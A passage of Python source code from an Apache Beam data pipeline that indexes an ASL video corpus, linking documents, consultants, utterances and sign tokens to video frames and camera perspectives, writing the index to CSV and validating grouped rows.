            document_asl_consultant_target_video_index_schemad_pcoll_row.CameraPerspective
          )
        )
      )
    | "Beam PL: select distinct ((<doc id>, <asl consultant id>, <utterance seq id>), (<target vid fname>, <camera perspective>))" >> beam.Distinct()
  )
  # Stage 2: key the token index by the same (doc, consultant, utterance) key and
  # derive each token's candidate frame-sequence ids from its start/end times
  # (milliseconds) at fidscs_globals.FPS frames per second.
  doc_consultant_utterance__to__token_map = (
    document_asl_consultant_utterance_token_index_schemad_pcoll
    | "Beam PL: extract ((<doc id>, <asl consultant id>, <utterance seq id>), (<tok vocab id>, <tok seq id>, <tok start time>, <tok end time>, listof(<frame seq id>))) from document_asl_consultant_utterance_token_index_schemad_pcoll" >> beam.Map(
        lambda document_asl_consultant_utterance_token_index_schemad_pcoll_row: (
          (
            document_asl_consultant_utterance_token_index_schemad_pcoll_row.DocumentID,
            document_asl_consultant_utterance_token_index_schemad_pcoll_row.ASLConsultantID,
            document_asl_consultant_utterance_token_index_schemad_pcoll_row.UtteranceSequence
          ),
          (
            document_asl_consultant_utterance_token_index_schemad_pcoll_row.TokenID,
            document_asl_consultant_utterance_token_index_schemad_pcoll_row.TokenSequence,
            document_asl_consultant_utterance_token_index_schemad_pcoll_row.StartTime,
            document_asl_consultant_utterance_token_index_schemad_pcoll_row.EndTime,
            # assumes StartTime/EndTime are milliseconds — TODO confirm against the
            # upstream utterance-token index producer
            [frame_seq_id for frame_seq_id in range(
                int(round(document_asl_consultant_utterance_token_index_schemad_pcoll_row.StartTime/1000.0*fidscs_globals.FPS)), # float(float(document_asl_consultant_utterance_token_index_schemad_pcoll_row.StartTime)/1000.0)*fidscs_globals.FPS
                int(round(document_asl_consultant_utterance_token_index_schemad_pcoll_row.EndTime/1000.0*fidscs_globals.FPS)) # float(float(document_asl_consultant_utterance_token_index_schemad_pcoll_row.EndTime)/1000.0)*fidscs_globals.FPS
              )
            ]
          )
        )
      )
    # debug
    # | "Beam PL: print doc_consultant__to__utterance_token_map" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="doc_consultant__to__utterance_token_map entry"))
  )
  # Stage 3: co-group target-video and token maps on the shared key, then sort
  # each key's target_video_map by camera perspective and token_map by token seq.
  doc_consultant_utterance__to__target_video_token_map = (
    ({
      'target_video_map': doc_consultant_utterance__to__target_video_map,
      'token_map': doc_consultant_utterance__to__token_map
    })
    | "Beam PL: merge target_video_map and token_map" >> beam.CoGroupByKey()
    # the above produces tuples of the form:
    #   (
    #     (<doc id>, <asl consultant id>, <utterance seq id>), # key
    #     {
    #       'target_video_map': [(<target vid fname>, <camera perspective>)], # up to three, corresponding to camera perspective
    #       'token_map': [(<tok vocab id>, <tok seq id>, <tok start time>, <tok end time>, listof(<frame seq id>))] # there will be many, corresponding to token sequence id for this utterance
    #     }
    #   )
    | "Beam PL: sort doc_consultant_utterance__to__target_video_token_map token_map based on <tok seq id>" >> beam.Map(
        lambda doc_consultant_utterance__to__target_video_token_map_tpl: (
          (
            doc_consultant_utterance__to__target_video_token_map_tpl[0][0], # <doc id>
            doc_consultant_utterance__to__target_video_token_map_tpl[0][1], # <asl consultant id>
            doc_consultant_utterance__to__target_video_token_map_tpl[0][2] # <utterance seq id>
          ),
          {
            'target_video_map': sorted(
              doc_consultant_utterance__to__target_video_token_map_tpl[1]['target_video_map'],
              key=lambda target_vid_info_tpl: target_vid_info_tpl[1] # <camera perspective>
            ),
            'token_map': sorted(
              doc_consultant_utterance__to__target_video_token_map_tpl[1]['token_map'],
              key=lambda tok_info_tpl: tok_info_tpl[1] # <tok seq id>
            )
          }
        )
      )
    # debug
    # | "Beam PL: print doc_consultant_utterance__to__target_video_token_map" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="doc_consultant_utterance__to__target_video_token_map entry"))
  )
  # Stage 4: keep only keys with a plausible number of camera perspectives; the
  # complementary ">" pcoll below exists purely as a validation/debug channel.
  doc_consultant_utterance__to__target_video_token_map__target_video_map_lte_MAX_CAMERA_PERSPECTIVES = (
    doc_consultant_utterance__to__target_video_token_map
    | f"filter doc_consultant_utterance__to__target_video_token_map_tpls with len(target_video_map)<={fidscs_globals.MAX_CAMERA_PERSPECTIVES}" >> beam.Filter(
        lambda doc_consultant_utterance__to__target_video_token_map_tpl: len(doc_consultant_utterance__to__target_video_token_map_tpl[1]['target_video_map'])<=fidscs_globals.MAX_CAMERA_PERSPECTIVES
      )
    # debug
    # | "Beam PL: print doc_consultant_utterance__to__target_video_token_map__target_video_map_lte_3" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="doc_consultant_utterance__to__target_video_token_map__target_video_map_lte_3 entry"))
  )
  # debug
  # we have a problem if doc_consultant_utterance__to__target_video_token_map__target_video_map_gt_MAX_CAMERA_PERSPECTIVES is non-empty!
  doc_consultant_utterance__to__target_video_token_map__target_video_map_gt_MAX_CAMERA_PERSPECTIVES = (
    doc_consultant_utterance__to__target_video_token_map
    | f"filter doc_consultant_utterance__to__target_video_token_map_tpls with len(target_video_map)>{fidscs_globals.MAX_CAMERA_PERSPECTIVES}" >> beam.Filter(
        lambda doc_consultant_utterance__to__target_video_token_map_tpl: len(doc_consultant_utterance__to__target_video_token_map_tpl[1]['target_video_map'])>fidscs_globals.MAX_CAMERA_PERSPECTIVES
      )
    # debug
    # | "Beam PL: print doc_consultant_utterance__to__target_video_token_map__target_video_map_gt_MAX_CAMERA_PERSPECTIVES" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg=f"{fidscs_globals.VALIDATION_WARNING_TEXT} len(target_video_map)>{fidscs_globals.MAX_CAMERA_PERSPECTIVES} entry"))
  )
  # now transform doc_consultant_utterance__to__target_video_token_map tuples
  # from:
  #   (
  #     (<doc id>, <asl consultant id>, <utterance seq id>), # key
  #     {
  #       'target_video_map': [(<target vid fname>, <camera perspective>)], # up to three, corresponding to camera perspective
  #       'token_map': [(<tok vocab id>, <tok seq id>, <tok start time>, <tok end time>, listof(<frame seq id>))] # there will be many, corresponding to token sequence id for this utterance
  #     }
  #   )
  # to:
  #   (
  #     (<doc id>, <asl consultant id>, <utterance seq id>, <tok seq id>), # key
  #     (
  #       <tok vocab id>,
  #       <tok start time>,
  #       <tok end time>,
  #       listof(<frame seq id>),
  #       listof((<target vid fname>, <camera perspective>))
  #     )
  #   )
  # Stage 5: flatten to one record per token (key now includes <tok seq id>).
  document_asl_consultant_utterance_token_frame_index_tpl_pcoll = (
    doc_consultant_utterance__to__target_video_token_map__target_video_map_lte_MAX_CAMERA_PERSPECTIVES
    | "Beam PL: transform doc_consultant_utterance__to__target_video_token_map__target_video_map_lte_MAX_CAMERA_PERSPECTIVES" >> beam.Map(
        lambda doc_consultant_utterance__to__target_video_token_map_tpl: [
          (
            (
              doc_consultant_utterance__to__target_video_token_map_tpl[0][0], # <doc id>
              doc_consultant_utterance__to__target_video_token_map_tpl[0][1], # <asl consultant id>
              doc_consultant_utterance__to__target_video_token_map_tpl[0][2], # <utterance seq id>
              token_info_tpl[1] # <tok seq id>
            ),
            (
              token_info_tpl[0], # <tok vocab id>
              token_info_tpl[2], # <tok start time>
              token_info_tpl[3], # <tok end time>
              token_info_tpl[4], # listof(<frame seq id>)
              doc_consultant_utterance__to__target_video_token_map_tpl[1]['target_video_map'], # listof((<target vid fname>, <camera perspective>))
            )
          ) for token_info_tpl in doc_consultant_utterance__to__target_video_token_map_tpl[1]['token_map']
        ]
      )
    | "Beam PL: 'explode' list of doc_consultant_utterance__to__target_video_token_map_tpl" >> beam.FlatMap(
        lambda list_doc_consultant_utterance__to__target_video_token_map_tpl: list_doc_consultant_utterance__to__target_video_token_map_tpl
      )
    # debug
    # | "Beam PL: print document_asl_consultant_utterance_token_frame_index_tpl_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document_asl_consultant_utterance_token_frame_index_tpl_pcoll entry"))
  )
  document_asl_consultant_utterance_token_frame_index_tpl_pcoll = beam__common.pl__X__sort_pcoll(
    document_asl_consultant_utterance_token_frame_index_tpl_pcoll,
    pcoll_label="document_asl_consultant_utterance_token_frame_index_tpl_pcoll"
  )
  # Stage 6: cross each token with its per-camera-perspective target videos and
  # then with each frame seq id, re-keying so the key matches the frame index.
  doc_consultant_target_video_frame__to__utterance_token_map = (
    document_asl_consultant_utterance_token_frame_index_tpl_pcoll
    | "Beam PL: 'explode' to list of ((<doc id>,<asl consultant id>,<camera perspective>,<target vid fname>,<utterance seq id>,<tok seq id>)),(listof(<frame seq id>),<tok vocab id>)) from document_asl_consultant_utterance_token_frame_index_tpl_pcoll" >> beam.Map(
        lambda document_asl_consultant_utterance_token_frame_index_tpl: [
          (
            (
              document_asl_consultant_utterance_token_frame_index_tpl[0][0], # <doc id>
              document_asl_consultant_utterance_token_frame_index_tpl[0][1], # <asl consultant id>
              target_vid_cam_persp[1], # <camera perspective>
              target_vid_cam_persp[0], # <target vid fname>
              document_asl_consultant_utterance_token_frame_index_tpl[0][2], # <utterance seq id>
              document_asl_consultant_utterance_token_frame_index_tpl[0][3] # <tok seq id>
            ),
            (
              document_asl_consultant_utterance_token_frame_index_tpl[1][3], # listof(<frame seq id>)
              document_asl_consultant_utterance_token_frame_index_tpl[1][0] # <tok vocab id>
            )
          # ) for target_vid_frame_seq_tpl in zip(document_asl_consultant_utterance_token_frame_index_tpl[1][4], document_asl_consultant_utterance_token_frame_index_tpl[1][3])
          ) for target_vid_cam_persp in document_asl_consultant_utterance_token_frame_index_tpl[1][4] # listof((<target vid fname>, <camera perspective>))
        ]
      )
    | "Beam PL: 'explode' list of ((<doc id>,<asl consultant id>,<camera perspective>,<target vid fname>,<utterance seq id>,<tok seq id>)),(listof(<frame seq id>),<tok vocab id>)) tuples" >> beam.FlatMap(
        lambda list_doc_consultant_target_video_utterance_token__to__list_of_frame_seq_map_tpl: list_doc_consultant_target_video_utterance_token__to__list_of_frame_seq_map_tpl
      )
    | "Beam PL: 'explode' to list of (<doc id>,<asl consultant id>,<camera perspective>,<target vid fname>,<utterance seq id>,<tok seq id>,<frame seq id>,<tok vocab id>) from list_doc_consultant_target_video_utterance_token__to__list_of_frame_seq_map_tpl" >> beam.Map(
        lambda tpl: [
          (
            (
              tpl[0][0], # <doc id>
              tpl[0][1], # <asl consultant id>
              tpl[0][2], # <camera perspective>
              tpl[0][3], # <target vid fname>
              frame_seq_id # <frame seq id>
            ),
            (
              tpl[0][4], # <utterance seq id>
              tpl[0][5], # <tok seq id>
              tpl[1][1] # <tok vocab id>
            )
          ) for frame_seq_id in tpl[1][0]
        ]
      )
    | "Beam PL: 'explode' list of tuples" >> beam.FlatMap(lambda list_tpl: list_tpl)
    # debug
    # | "Beam PL: print doc_consultant_target_video_frame__to__utterance_token_map" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="doc_consultant_target_video_frame__to__utterance_token_map entry"))
  )
  # document_asl_consultant_target_video_frame_index_schemad_pcoll
  #   beam.Row(
  #     DocumentID=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][0]),
  #     ASLConsultantID=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][1]),
  #     CameraPerspective=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][2]),
  #     TargetVideoFilename=str(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][0]),
  #     FrameSequence=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][1]),
  #     FramePath=str(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][2])
  #     # , JPEGBytes=sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][3]
  #   )
  # Stage 7: build a sentinel map of frames that actually exist so the derived
  # per-token frame ranges can be reconciled against extracted frame images.
  existing_target_video_frames_pcoll = (
    document_asl_consultant_target_video_frame_index_schemad_pcoll
    | "Beam PL: extract ((<doc id>, <asl consultant id>, <camera perspective>, <target vid fname>, <frame seq id>), '<TARGET VIDEO FRAME EXISTS>') from document_asl_consultant_target_video_frame_index_schemad_pcoll" >> beam.Map(
        lambda document_asl_consultant_target_video_frame_index_schemad_pcoll_row: (
          (
            document_asl_consultant_target_video_frame_index_schemad_pcoll_row.DocumentID,
            document_asl_consultant_target_video_frame_index_schemad_pcoll_row.ASLConsultantID,
            document_asl_consultant_target_video_frame_index_schemad_pcoll_row.CameraPerspective,
            document_asl_consultant_target_video_frame_index_schemad_pcoll_row.TargetVideoFilename,
            document_asl_consultant_target_video_frame_index_schemad_pcoll_row.FrameSequence
          ),
          '<TARGET VIDEO FRAME EXISTS>'
        )
      )
    # debug
    # | "Beam PL: print existing_target_video_frames_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="existing_target_video_frames_pcoll entry"))
  )
  # Stage 8: co-group the existence sentinels with the utterance-token map; an
  # empty 'target_video_frame_exists' list marks a frame with no extracted image.
  doc_consultant_target_video_frame__to__target_video_token_map = (
    ({
      'target_video_frame_exists': existing_target_video_frames_pcoll,
      'existing_utterance_token_map': doc_consultant_target_video_frame__to__utterance_token_map
    })
    | "Beam PL: merge existing_target_video_frames_map and utterance_token_map" >> beam.CoGroupByKey()
    # the above produces tuples of the form:
    #   (
    #     (<doc id>, <asl consultant id>, <camera perspective>, <target vid fname>, <frame seq id>), # key
    #     {
    #       'target_video_frame_exists': ['<TARGET VIDEO FRAME EXISTS>'] | [], # if empty, then the frame does not exist in document_asl_consultant_target_video_frame_index_schemad_pcoll
    #       'utterance_token_map': [(<utterance seq id>, <tok seq id>, <tok vocab id>)]
    #     }
    #   )
    # debug
    # | "Beam PL: print doc_consultant_target_video_frame__to__target_video_token_map" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="doc_consultant_target_video_frame__to__target_video_token_map entry"))
  )
  # frames referenced by tokens but absent from the extracted-frame index
  # (computed for diagnostics; not consumed further in this visible scope)
  doc_consultant_target_video_frame__to__target_video_token_map__non_existing_frame = (
    doc_consultant_target_video_frame__to__target_video_token_map
    | "Beam PL: filter non-existing frames (in document_asl_consultant_target_video_frame_index_schemad_pcoll)" >> beam.Filter(
        lambda doc_consultant_target_video_frame__to__target_video_token_map_tpl: len(doc_consultant_target_video_frame__to__target_video_token_map_tpl[1]['target_video_frame_exists'])==0
      )
  )
  doc_consultant_target_video_frame__to__target_video_token_map__existing_frame = (
    doc_consultant_target_video_frame__to__target_video_token_map
    | "Beam PL: filter existing frames (in document_asl_consultant_target_video_frame_index_schemad_pcoll)" >> beam.Filter(
        lambda doc_consultant_target_video_frame__to__target_video_token_map_tpl: len(doc_consultant_target_video_frame__to__target_video_token_map_tpl[1]['target_video_frame_exists'])>0
      )
    # debug
    # | "Beam PL: print doc_consultant_target_video_frame__to__target_video_token_map__existing_frame" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="doc_consultant_target_video_frame__to__target_video_token_map__existing_frame entry"))
  )
  # existing frames with no associated utterance token (diagnostics only)
  doc_consultant_target_video_frame__to__target_video_token_map__existing_frame__non_existing_utterance_token = (
    doc_consultant_target_video_frame__to__target_video_token_map__existing_frame
    | "Beam PL: filter non-existing record keys (in doc_consultant_target_video_frame__to__utterance_token_map)" >> beam.Filter(
        lambda doc_consultant_target_video_frame__to__target_video_token_map__existing_frame_tpl: len(doc_consultant_target_video_frame__to__target_video_token_map__existing_frame_tpl[1]['existing_utterance_token_map'])==0
      )
  )
  # Stage 9: final flattening — one record per (frame, utterance-token) pairing,
  # restricted to frames that both exist and have token associations.
  document_asl_consultant_target_video_utterance_token_frame_index_pcoll = (
    doc_consultant_target_video_frame__to__target_video_token_map__existing_frame
    | "Beam PL: filter existing record keys (in doc_consultant_target_video_frame__to__utterance_token_map)" >> beam.Filter(
        lambda doc_consultant_target_video_frame__to__target_video_token_map__existing_frame_tpl: len(doc_consultant_target_video_frame__to__target_video_token_map__existing_frame_tpl[1]['existing_utterance_token_map'])>0
      )
    | "Beam PL: extract ((<doc id>, <asl consultant id>, <camera perspective>, <target vid fname>, <utterance seq id>, <token seq id>), (<token vocab id>, <frame seq id>)) from doc_consultant_target_video_frame__to__target_video_token_map" >> beam.Map(
        # (
        #   (<doc id>, <asl consultant id>, <camera perspective>, <target vid fname>, <frame seq id>), # key
        #   {
        #     'target_video_frame_exists': ['<TARGET VIDEO FRAME EXISTS>'] | [], # if empty, then the frame does not exist in document_asl_consultant_target_video_frame_index_schemad_pcoll
        #     'utterance_token_map': [(<utterance seq id>, <tok seq id>, <tok vocab id>)]
        #   }
        # )
        lambda doc_consultant_target_video_frame__to__target_video_token_map_tpl: [
          (
            (
              doc_consultant_target_video_frame__to__target_video_token_map_tpl[0][0], # <doc id>
              doc_consultant_target_video_frame__to__target_video_token_map_tpl[0][1], # <asl consultant id>
              doc_consultant_target_video_frame__to__target_video_token_map_tpl[0][2], # <camera perspective>
              doc_consultant_target_video_frame__to__target_video_token_map_tpl[0][3], # <target vid fname>
              utterance_token_tpl[0], # <utterance seq id>
              utterance_token_tpl[1], # <token seq id>
              doc_consultant_target_video_frame__to__target_video_token_map_tpl[0][4], # <frame seq id>
            ), # key
            utterance_token_tpl[2] # <tok vocab id>
          ) for utterance_token_tpl in doc_consultant_target_video_frame__to__target_video_token_map_tpl[1]['existing_utterance_token_map']
        ]
      )
    | "Beam PL: 'explode' list of document_asl_consultant_target_video_utterance_token_frame_index tuples" >> beam.FlatMap(
        lambda list_document_asl_consultant_target_video_utterance_token_frame_index_tpl: list_document_asl_consultant_target_video_utterance_token_frame_index_tpl
      )
    # debug
    # | "Beam PL: print document_asl_consultant_target_video_utterance_token_frame_index_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document_asl_consultant_target_video_utterance_token_frame_index_pcoll entry"))
  )
  sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll = beam__common.pl__X__sort_pcoll(
    document_asl_consultant_target_video_utterance_token_frame_index_pcoll,
    pcoll_label="document_asl_consultant_target_video_utterance_token_frame_index_pcoll"
  )
  # Stage 10: apply the final schema. NOTE: the lambda parameter name shadows the
  # pcoll variable of the same name above; it binds each individual tuple here.
  document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll = (
    sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll
    | "Beam PL: apply schema to create final document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll" >> beam.Map(
        lambda sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll: beam.Row(
          # SCHEMA_COL_NAMES__UTTERANCE_TOKEN_FRAME_DS = [
          #   'DocumentID',
          #   'ASLConsultantID',
          #   'CameraPerspective',
          #   'TargetVideoFilename',
          #   'UtteranceSequence',
          #   'TokenSequence',
          #   'FrameSequence',
          #   'TokenID'
          # ]
          DocumentID=int(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[0][0]),
          ASLConsultantID=int(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[0][1]),
          CameraPerspective=int(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[0][2]),
          TargetVideoFilename=str(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[0][3]),
          UtteranceSequence=int(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[0][4]),
          TokenSequence=int(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[0][5]),
          FrameSequence=int(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[0][6]),
          TokenID=int(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[1])
        )
      )
    # debug
    # | "Beam PL: print document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll entry"))
  )
  return document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll
def pl__9__write_document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll(document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll, d_pl_options):
  """
  Serialize the utterance-token-frame index pcoll to its CSV dataset file.

  Each schemad beam.Row is flattened to a CSV string, then handed to the
  shared CSV writer together with the dataset label, filename, and column
  schema from fidscs_globals.

  Returns whatever beam__common.pl__X__write_pcoll_to_csv returns (the
  written CSV path pcoll).
  """
  csv_rows_pcoll = (
    document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll
    | beam.Map(
        lambda schemad_row: beam__common.beam_row_to_csv_string(schemad_row)
      )
  )
  return beam__common.pl__X__write_pcoll_to_csv(
    csv_rows_pcoll,
    "DOCUMENT-ASLCONSULTANT-TARGETVIDEO-UTTERANCE-TOKEN-FRAME-INDEX",
    fidscs_globals.UTTERANCE_TOKEN_FRAME_DS_FNAME,
    fidscs_globals.SCHEMA_COL_NAMES__UTTERANCE_TOKEN_FRAME_DS,
    d_pl_options
  ) # document_asl_consultant_target_video_utterance_token_frame_index_csv_path
def validate_preprocess_doc_participant_to_utterance_video_cameraperspective_mapping(tvftmdputftvimt):
  """
  Validate one grouped target-video row and emit keyed utterance/camera rows.

  tvftmdputftvimt (abbreviation for target_video_fname_to_merged_doc_participant_utterance_target_full_target_vid_index_mapping_tpl):
    (
      <media fname>, # key
      {
        'target_video_doc_participant_utterance_mapping': [
          (
            <corpus doc filename>,
            <participant_name>,
            <utterance seq id>
          )
        ],
        'target_full_target_vid_index_mapping': [
          beam.Row(
            target_video_filename=<target_video_filename>,
            video_seq_id=<video_seq_id>,
            perspective_cam_id=<perspective_cam_id>,
            compressed_mov_url=<compressed_mov_url>,
            uncompressed_avi_url=<uncompressed_avi_url>,
            uncompressed_avi_mirror_1_url=<uncompressed_avi_mirror_1_url>,
            <uncompressed_avi_mirror_2_url>
          )
        ]
      }
    )
  return:
    listof(
      ((<document fname>, <participant name>), (<utterance seq id>, <media fname>, <camera perspective>))
    )

  Validation failures are reported via print; non-unique docs/participants are
  warnings (subject to OUTPUT_INFO_LEVEL), a missing camera perspective or
  missing document association is fatal text but still yields a row.
  """
  target_video_fname = tvftmdputftvimt[0]
  target_video_doc_participant_utterance_mapping = tvftmdputftvimt[1]['target_video_doc_participant_utterance_mapping']
  target_full_target_vid_index_mapping = tvftmdputftvimt[1]['target_full_target_vid_index_mapping']
  validated_results = []
  # there should always only be ONE camera perspective per video_fname file
  camera_perspective = None
  if len(target_full_target_vid_index_mapping) > 0:
    for full_target_vid_index_pcoll_row in target_full_target_vid_index_mapping:
      # _camera_perspective = full_target_vid_index_pcoll_row['CameraPerspective']
      _camera_perspective = full_target_vid_index_pcoll_row.perspective_cam_id
      if camera_perspective is None:
        # first (and expected only) perspective observed for this video
        camera_perspective = _camera_perspective
      else:
        if _camera_perspective != camera_perspective:
          print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} target video {target_video_fname} camera perspective not unique! It has camera perspectives: {camera_perspective} and {_camera_perspective}")
          break
  else:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} target video {target_video_fname} has no associated camera perspective!")
  doc_fname = None
  participant_name = None
  utterance_seq_id = None
  if len(target_video_doc_participant_utterance_mapping) > 0:
    multiple_docs = []
    multiple_participants = []
    multiple_utterances = []
    for target_video_doc_participant_utterance_mapping_instance in target_video_doc_participant_utterance_mapping:
      _doc_fname = target_video_doc_participant_utterance_mapping_instance[0]
      _participant_name = target_video_doc_participant_utterance_mapping_instance[1]
      _utterance_seq_id = target_video_doc_participant_utterance_mapping_instance[2]
      if doc_fname is None or len(doc_fname)==0:
        doc_fname = _doc_fname
        multiple_docs.append(_doc_fname)
      else:
        if _doc_fname != doc_fname:
          multiple_docs.append(_doc_fname)
      if participant_name is None or len(participant_name)==0:
        participant_name = _participant_name
        multiple_participants.append(_participant_name)
      else:
        if _participant_name != participant_name:
          multiple_participants.append(_participant_name)
      # NOTE(review): this condition tests utterance_seq_id (the accumulator) for
      # None but _utterance_seq_id (the current value) for type/range — looks
      # like a latent inconsistency; preserved as-is, confirm intent upstream.
      if utterance_seq_id is None or not isinstance(_utterance_seq_id, int) or _utterance_seq_id<0:
        utterance_seq_id = _utterance_seq_id
        multiple_utterances.append(_utterance_seq_id)
      else:
        if _utterance_seq_id != utterance_seq_id:
          multiple_utterances.append(_utterance_seq_id)
      validated_results.append(
        (
          (_doc_fname, _participant_name),
          (_utterance_seq_id, target_video_fname, camera_perspective)
        )
      )
    multiple_docs = set(multiple_docs)
    if len(multiple_docs) > 1 and fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
      print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} target video {target_video_fname} document occurrence is not unique! It occurs in documents: {multiple_docs}")
    multiple_participants = set(multiple_participants)
    if len(multiple_participants) > 1 and fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
      print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} target video {target_video_fname} participant occurrence is not unique! It has participants: {multiple_participants}")
    # if len(multiple_utterances) > 1: # this is actually expected
    #   print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} target video {target_video_fname} utterance seq id occurrence is not unique! It has utterance seq ids: {multiple_utterances}")
  else:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} target video {target_video_fname} is not associated with a corpus document!")
    # BUG FIX: list.append was previously called with TWO positional arguments
    # ((key_tpl, data_tpl) as separate args), which raises
    # "TypeError: append() takes exactly one argument (2 given)" whenever a
    # target video has no corpus-document association. The key/data pair must
    # be wrapped in a single tuple to match the rows built in the happy path.
    validated_results.append(
      (
        (None, participant_name),
        (utterance_seq_id, target_video_fname, camera_perspective)
      )
    )
  return validated_results
def validate_preprocess_video_doc_participant_utterance_camera_perspective_with_ids_pcoll_row_tpl(vdpucpwiprt):
  """
  Validate a single grouped row keyed by (<doc filename>, <participant name>).

  vdpucpwiprt (video_doc_participant_utterance_camera_perspective_with_ids_pcoll_row_tpl):
    (
      (<doc filename>, <participant name>), # key
      {
        'document_participant_with_ids_mapping': [
          (<doc id>, <asl consultant id>)
        ],
        'doc_participant_to_utterance_video_cameraperspective_mapping': [
          (<utterance seq id>, <video fname>, <camera perspective>)
        ]
      }
    )

  On success, returns:
    listof(
      ((<doc id>, <asl consultant id>), (<doc filename>, <participant name>, <utterance seq id>, <media filename>, <camera perspective>))
    )

  On any validation failure the raw input tuple is returned unchanged; its
  shape deliberately mismatches validated rows so beam surfaces the problem.
  """
  doc_fname = vdpucpwiprt[0][0]
  if doc_fname is None or len(doc_fname) == 0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} video_doc_participant_utterance_camera_perspective_with_ids_pcoll_row_tpl {vdpucpwiprt} has no associated corpus document filename")
    return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
  participant_name = vdpucpwiprt[0][1]
  if participant_name is None or len(participant_name) == 0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} video_doc_participant_utterance_camera_perspective_with_ids_pcoll_row_tpl {vdpucpwiprt} has no associated participant name")
    return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
  id_pair_instances = vdpucpwiprt[1]['document_participant_with_ids_mapping']
  utterance_media_instances = vdpucpwiprt[1]['doc_participant_to_utterance_video_cameraperspective_mapping']
  # guard: every grouped row must carry at least one (<doc id>, <asl consultant id>) pair
  if len(id_pair_instances) == 0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document {doc_fname} has no document_participant_with_ids_mapping!")
    return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
  # there should always only be ONE (<doc id>, <asl consultant id>) per mapping
  doc_id = None
  asl_consultant_id = None
  for id_pair in id_pair_instances:
    _doc_id = id_pair[0]
    _asl_consultant_id = id_pair[1]
    if doc_id is None:
      doc_id = _doc_id
    elif _doc_id != doc_id:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document {doc_fname} doc_id is not unique! It has doc ids: {doc_id} and {_doc_id}")
      return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
    if asl_consultant_id is None:
      asl_consultant_id = _asl_consultant_id
    elif _asl_consultant_id != asl_consultant_id:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document {doc_fname} asl_consultant_id is not unique! It has doc ids: {asl_consultant_id} and {_asl_consultant_id}")
      return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
  # guard: there must be at least one (<utterance seq id>, <video fname>, <camera perspective>) entry
  if len(utterance_media_instances) == 0:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document {doc_fname} has no doc_participant_to_utterance_video_cameraperspective_mapping entries")
    return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
  validated_results = []
  for utterance_media_instance in utterance_media_instances:
    # (<utterance seq id>, <video fname>, <camera perspective>)
    _utterance_seq_id = utterance_media_instance[0]
    if _utterance_seq_id is None or not isinstance(_utterance_seq_id, int) or _utterance_seq_id < 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document {doc_fname} has an invalid utterance seq id: {_utterance_seq_id}")
      return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
    _media_fname = utterance_media_instance[1]
    if _media_fname is None or len(_media_fname) == 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document {doc_fname} has an empty (or None) media filename")
      return vdpucpwiprt # note that this will cause an exception in beam since the shape will not match other validated rows
    _camera_perspective = utterance_media_instance[2]
    if _camera_perspective is None or not isinstance(_camera_perspective, int) or _camera_perspective < 0:
      print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document {doc_fname} has an invalid camera perspective: {_camera_perspective}")
